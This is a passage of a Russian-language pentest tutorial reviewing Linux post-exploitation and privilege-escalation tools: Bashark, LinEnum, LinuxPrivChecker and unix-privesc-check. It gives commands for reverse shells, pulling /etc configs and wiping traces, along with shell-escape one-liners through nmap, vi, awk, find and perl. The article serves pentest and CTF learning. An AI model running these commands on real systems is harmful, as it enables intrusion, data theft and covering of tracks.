Переходим в соответствующую директорию и даем права на выполнение:

1
2
$ cd Bashark
$ chmod +x bashark.sh
Запускаем Bashark:

1
$ ./bashark.sh
Вывод информации о системе — краткий вариант
Вывод информации о системе — краткий вариант
В чем еще уникальность Bashark? С помощью опции portscan мы можем сканировать внутреннюю сетку из-под одной скомпрометированной машины. Чтобы получить все файлы конфигурации с другой взломанной машины на Linux, можно использовать опцию getconf. Команда позволяет извлекать все файлы конфигурации, хранящиеся в каталоге /etc. Точно так же легко и просто можно использовать опцию getprem для просмотра всех двоичных файлов на целевой системе.

Сканируем удаленную машину с помощью Bashark:

1
$ portscan <target’s IP>
Получаем конфиги:

1
$ getconf
Получаем файлы:

1
$ getprem
Получаем реверс-шелл:

1
$ revshell <target’s IP> <Port 31337>
Получение реверсивной оболочки на удаленной машине
Получение реверсивной оболочки на удаленной машине
Еще одна приятная мелочь — это фича самоочистки (удаления следов работы в системе). Например, если вы создавали файлы или каталоги во время работы в контексте Bashark с помощью опции -t (создать файл) или -mkd (создать каталог), подпрограмма quit (то есть завершение работы) будет активировать директиву cleanup, затирающую все следы присутствия в системе.

Заметание следов при завершении работы скрипта
Заметание следов при завершении работы скрипта
LinEnum
Данный скрипт представляет собой экспресс-тест по таким позициям, как Kernel and distribution release details, System Information, Privileged access, Jobs/Tasks, Services, Default/Weak Credentials, Searches, Platform/software specific tests.

Скрипт LinEnum успешно протестирован на различных версиях дистрибутивов Ubuntu, Debian, Red Hat и CentOS. Программа не ищет и не пытается выполнять эксплоиты, как некоторые другие аналогичные рассмотренные в статье инструменты повышения привилегий в Linux, — она только собирает информацию и делает проверки возможных векторов эскалации привилегий.

Установка LinEnum в систему:

1
2
$ git clone https://github.com/rebootuser/LinEnum
$ cd LinEnum/
Простой запуск с вызовом списка ключей:

1
$ ./LinEnum.sh
Пример запуска LinEnum с опциями (ключами):

1
$ ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t
Описание ключей LinEnum:

-k — ввести ключевое слово
-e — указать директорию для экспорта отчета
-t — включить в отчет «длинные» тесты (дополнительные тесты)
-s — произвести проверку эскалации текущей учетки sudo perms
-r — задать имя итогового отчета
-h — вызвать встроенную справку по программе
-k — опциональный переключатель, с которым можно указать ключевое слово для поиска файлов по нескольким расширениям
Запуск без опций означает ограниченное сканирование без файла вывода.

Стартовое меню LinEnum
Стартовое меню LinEnum
Результаты запуска скрипта LinEnum
Результаты запуска скрипта LinEnum
LinuxPrivChecker
Еще один полезный в эскалации привилегий скрипт, написанный на Python. Этот инструмент предназначен для локального выполнения в системе с целью перечисления базовой системной информации и поиска общих векторов повышения привилегий, таких как общедоступные файлы, неверные конфигурации демонов и библиотек, пароли, хранимые в виде открытого текста, и баги, соответствующие наиболее популярным эксплоитам.

Основные области проверки:

основная информация о системе (ОС, ядро, имя системы и так далее);
информация о сети (ifconfig, route, netstat и т. д.);
разная информация о файловой системе (mount, fstab, cron jobs);
информация о пользователе (текущий пользователь, все пользователи, суперпользователи, история команд);
права доступа к файлам и каталогам (доступные для записи файлы/каталоги, файлы suid, корневой домашний каталог);
файлы, содержащие незашифрованные пароли;
интересные файлы, процессы и приложения (все процессы и пакеты, все процессы, запускаемые пользователем root и связанные пакеты, версия sudo, файл конфигурации Apache);
все установленные языки и инструменты (GCC, Perl, Python, Nmap, Netcat, Wget, FTP и так далее);
все соответствующие эксплоиты повышения привилегий (с использованием базы данных эксплоитов с применимыми версиями ядра, пакетами/процессами программного обеспечения).
Проверка на эскалацию привилегий производится в следующих программах:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
nmap
-interactive

vi
:!bash
:set shell=/bin/bash:shell

awk
awk ‘BEGIN {system(“/bin/bash”)}’

find
find / -exec /usr/bin/awk ‘BEGIN {system(“/bin/bash”)}’ \;

perl
perl -e ‘exec “/bin/bash”;’
Итак, качаем скрипт LinuxPrivChecker:

1
$ wget http://www.securitysift.com/download/li … checker.py
Запускаем LinuxPrivChecker с помощью всего лишь одной команды:

1
2
$ chmod +x linuxprivchecker.py
$ ./linuxprivchecker.py
Или другой вариант запуска LinuxPrivChecker:

1
$ python linuxprivchecker.py
Результаты запуска скрипта LinuxPrivChecker
Результаты запуска скрипта LinuxPrivChecker
Unix-privesc-check
Unix-privesc-checker — это мощный скрипт, работающий в Unix-системах (протестирован на Solaris 9, HPUX 11, различных Linux 3.х и FreeBSD 6.2+). После запуска скрипт пытается найти неправильные твики конфигурации системы, процессы, которые могут позволить локальным непривилегированным пользователям повышать привилегии других юзеров или получать доступ к локальным приложениям, например базам данных MySQL.

Основные области проверки:

слабые пароли и значения по умолчанию;
конфигурация стека IP (без ненужного использования IPv6, без форвардинга IP-пакетов и так далее);
некорректные права доступа к файлам (чтение/изменение конфиденциальных данных);
настройка локальных приложений (просмотр sshd_config, httpd.conf);
другие полезные вещи (например, удаленное ведение журнала, использование небезопасных протоколов TCP/IP).
Основное внимание разработчики данного скрипта уделяют проверке на предмет распространенных ошибок в конфигурации системы и некорректно настроенных разрешений на доступ к директориям и файлам. Важно отметить, что скрипт не проверяет наличие отсутствующих патчей для ядра ОС или установленных пакетов, но это и не его задача, ведь для ее решения существуют более сложные утилиты, о которых мы рассказывали в нашем предыдущем материале про аудит Linux.

Скрипт может запускаться как от имени обычного пользователя, так и от имени root. В последнем случае у скрипта больше привилегий и он может выполнить ряд тестов, недоступных из-под учетной записи непривилегированного пользователя. Для регулярного мониторинга запуск скрипта можно прописать как задание cron.

Пример запуска скрипта Unix-privesc-check:

1
$ ./unix-privesc-check > output.txt
Запуск unix-privesc-check в терминале
Запуск unix-privesc-check в терминале
Полезные ссылки
Поскольку объем нашей статьи не умещает всего, что еще можно было сказать по заявленной теме, вам, предоставляется счастливая возможность попрактиковаться в самостоятельном изучении и заценить вот этот список дополнительных материалов.

Linux Post Exploitation Command List — шпаргалка по основным командам постэксплуатации, которые можно самостоятельно вводить в терминале. Ничего необычного, стандартные команды, известные любому мало-мальски знающему Linux пользователю.
Post Exploitation Collection — репозиторий GitHub, представляющий собой огромную коллекцию трюков постэксплуатации для Windows, Linux, Mac, *BSD, а также .msf4 & Metasploit scripts.
Basic Linux Privilege Escalation — одностраничный гайд по основным векторам атак на фазе постэксплуатации.
GitBook Post Exploitation — лютый GitBook по теме Privilege Escalation. Рассматривается куча техник эксплуатации: Kernel exploits, Programs running as root, Inside service, Suid misconfiguration, Abusing sudo-rights, Bad path configuration, Cronjob, Unmounted filesystems. Примеры готовых скриптов на Python.
Cheeat map — еще один вариант хендбука по теме постэксплуатации с примерами команд и кода на скриптовых языках.
Заключение
Сегодня в материале мы рассмотрели самые популярные и, главное, рабочие инструменты, которые используются в фазе постэксплуатации. Приведенный набор инструментов пригодится как участникам War Games и различных CTF-соревнований, так и опытным пентестерам, проверяющим на прочность безопасность корпоративного периметра. Также в нашем обзоре мы привели еще несколько утилит, которые позволят прочекать доверенные вам системы на факт возможности повышения привилегий Linux и использования других техник постэксплуатации. Теперь вы вооружены!